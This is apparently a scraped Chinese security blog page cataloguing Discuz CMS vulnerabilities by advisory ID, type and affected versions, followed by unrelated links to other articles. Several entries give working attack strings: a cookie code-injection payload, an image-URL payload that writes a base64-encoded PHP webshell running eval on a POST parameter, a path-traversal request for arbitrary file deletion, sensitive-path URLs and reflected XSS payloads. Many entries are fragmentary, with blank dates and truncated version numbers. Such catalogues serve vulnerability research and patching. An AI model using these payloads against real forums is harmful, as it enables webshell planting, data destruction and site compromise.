应用安全 - CMS - Discuz漏洞汇总
Discuz ML! V3.X 代码注入
Date
类型
代码注入导致RCE 影响范围
Discuz!ML v.3.4 、Discuz!ML v.3.2 、Discuz!ML v.3.3 product of codersclub.org poc
_language=sc'.phpinfo().';
SSV-90861
Date:
2012 类型:
敏感信息泄露 影响范围:
DZ x2.5 POC:
http://www.xx.xx/uc_server/control/admin/db.php
http://www.xx.xx/source/plugin/myrepeats/table/table_myrepeats.php
http://www.xx.xx/install/include/install_lang.php
Discuz! X2.5 远程代码执行
Date:
类型:
RCE 前置条件:
().注册任意账户
().登陆用户,发表blog日志(注意是日志)
().添加图片,选择网络图片,地址{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
().访问日志,论坛根目录下生成demo.php,一句发密码c 影响范围:
v2.
Discuz!X2/2.5弱口令破解漏洞
Date:
类型:
登录界面暴力破解 影响范围:
Discuz!X2/2.5
ssvid-93588
Date:
类型:
任意文件删除 前置条件:
(1)登陆DZ前台
(2)请求:
home.php?mod=spacecp&ac=profile&op=base
POST birthprovince=../../../test.txt&profilesubmit=1&formhash=b644603b
修改成功之后出生地就会变为../../../test.txt
(3)构造请求向home.php?mod=spacecp&ac=profile&op=base上传文件(普通图片即可)
请求后文件被删除
影响范围:
version<=3.4
SSV-96608
Date:
2014.10 类型:
前台任意文件删除 影响范围:
SSV-89024
Date:
2015.1 类型:
Discuz X2. /source/class/class_image.php 命令执行漏洞 影响范围:
Discuz X2.
Discuz! X系列远程代码执行漏洞
Date:
2015.8 类型:
RCE + XML反序列化 前置条件:
访问:/api/uc.php
影响范围:
SSV-91183
Date:
2016.3 类型:
SSRF
影响范围:
Discuz! X2 X3 POC:
http://www.internetblog.cn/archives/6068.html?mip
CVE-2018-14729
Date:
2018.8 类型:
远程代码执行
前置条件:
登录后台
影响范围:
Discuz! 1.5-2.5
Discuz
Discuz!X ≤3.4 任意文件删除漏洞分析 Discuz!7.2/X1 第三方插件SQL注入及持久型XSS漏洞
SQL注入及跨站脚本漏洞。
moodwall.inc.php
发表心情处直接插入html代码
code 区域
"><script>alert(/xss/)</script> Discuz! X1某页面存在XSS漏洞
简要描述:
页面对取到的参数没有过滤,直接echo到了html里
详细说明:
api/db/dbbak.php页面,对$apptype缺少必要的过滤,调用api_msg()函数时直接将$apptype echo到了html中。
漏洞证明:
http://**.**.**.**/api/db/dbbak.php?apptype=1%22%3E%3Cscript%3Ealert(1)%3C/script%3E%3C%22
应用安全 - CMS - Discuz漏洞汇总的更多相关文章
- 应用安全 - PHP - CMS - EmpireCMS - 漏洞 - 汇总
2006 Empire CMS <= 3.7 (checklevel.php) Remote File Include Vulnerability Empire CMS Checklevel.P ...
- 应用安全 - PHP - CMS - DeDeCMS - 漏洞 - 汇总
SSV-97074 Date 类型 前台任意密码修改 影响范围 前置条件 CVE-2018-20129 Date 类型前台文件上传 影响范围 前置条件(1)前台登录(2)/member/article ...
- 应用安全 - CMS - ThinkCMF - 漏洞汇总
ThinkCMF X1.6.0-X2.2.3任意内容包含漏洞 Date: 2019.10 类型: 任意文件写入导致远程代码执行 影响范围: ThinkCMF X1.6.0 ThinkCMF X2.1. ...
- 应用安全 - CMS - vBulletin漏洞汇总
SSV-15384 Date: 2004.11 漏洞类别: SQL 注入 SSV-15476 Date: 2005.2 漏洞类别: RCE SSV-15482 Date: 2005.2 类型: RCE ...
- 应用安全 - CMS - PHPCMS漏洞汇总
CVE-2011-0644 Date: 2011.1 类型: /flash_upload.php SQL注入 影响版本:phpCMS 2008 V2 PHPCMS PHPCMS通杀XSS 在我要报错功 ...
- 苹果cms网站漏洞修复解决办法
苹果cms系统,是目前很多电影网站都在使用的一套网站系统,开源,免费,扩展性较好,支持一键采集,伪静态化,高并发的同时承载,获得的很多站长的喜欢,于近日被网站安全检测发现,maccms存在网站漏洞,s ...
- Discuz被挂马 快照被劫持跳转该如何处理 如何修复discuz漏洞
Discuz 3.4是目前discuz论坛的最新版本,也是继X3.2.X3.3来,最稳定的社区论坛系统.目前官方已经停止对老版本的补丁更新与升级,直接在X3.4上更新了,最近我们SINE安全在对其安全 ...
- 怎么修复网站漏洞 骑士cms的漏洞修复方案
骑士CMS是国内公司开发的一套开源人才网站系统,使用PHP语言开发以及mysql数据库的架构,2019年1月份被某安全组织检测出漏洞,目前最新版本4.2存在高危网站漏洞,通杀SQL注入漏洞,利用该网站 ...
- Apache Shiro 漏洞汇总
Apache Shiro 漏洞汇总 以下是我个人通过收集信息收集起来的一些Apache Shiro漏洞信息,这些漏洞的poc都是公开的,利用起来也是比较简单 Apache Shiro是什么东西: Ap ...
随机推荐
- 生成不带版本的jar包 不影响deploy
1 How to build maven project without version? 工程pom中增加 <project> ... <build> ... <fin ...
- requests中text,content,json之间的区别
response.text : 返回一个字符串\n",content : 返回二进制\n",json() : 返回对象"
- 【leetcode】1200. Minimum Absolute Difference
题目如下: Given an array of distinct integers arr, find all pairs of elements with the minimum absolute ...
- 【mysql】全文索引match多列报错
表结构如下: CREATE TABLE `T` ( .... FULLTEXT KEY `title_fc` (`titleindex`), FULLTEXT KEY `shortname_fc` ( ...
- Leaflet调用geoserver发布的矢量切片
geoserver如何发布切片就不写了,大家都可以查到. index.html <!DOCTYPE html> <html> <head> <meta cha ...
- delphi回调函数高级应用
用法一 Type TProc=procedure() of object; procedure Callback(proc:TProc); begin ... end; procedure mypro ...
- 汇总apply()、call()、bind()用法详解
先看明白下面: 例 1 obj.objAge; // 17 obj.myFun() // 小张年龄 undefined 例 2 shows() // 盲僧 比较一下这两者 this 的差别,第一个打印 ...
- linux-dns-11
1网卡设置配置文件里面DNS服务器地址设置,2.系统默认DNS服务器地址设置.3,hosts文件指定 生效顺序是: 1 hosts文件 ---- 2 网卡配置文件DNS服务地址 ---3 /etc/r ...
- jeesite安装时Perhaps you are running on a JRE rather than a JDK
使用自己本地安装的maven,启动jeesite报错: No compiler is provided in this environment. Perhaps you are running on ...
- Android使用init.rc触发脚本实现隐藏内置应用
[实现逻辑] 通过在property_service.c中设置标志位,在设置中实现接口改变标志位, 使用init.rc中声明的服务来侦听标志位的变化,显式启动声明的服务,执行对应的脚本,把应用后缀从a ...